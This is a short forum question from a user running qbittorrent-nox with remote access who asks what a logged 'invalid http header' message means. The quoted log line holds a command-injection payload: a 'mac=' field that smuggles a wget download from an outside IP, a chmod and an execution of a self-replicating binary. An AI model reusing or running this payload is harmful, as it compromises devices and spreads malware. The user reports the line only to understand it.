# qbittorrent-nox invalid http header

Tags: remote-access, bittorrent

I've installed qbittorent-nox with remote access and sometimes I get these kind of messages:

```
bool Http::RequestParser::parseRequestLine(const QString&) invalid http header: "time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://103.110.33.164/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;"
```

So I changed the port address
What's this message?

Thank you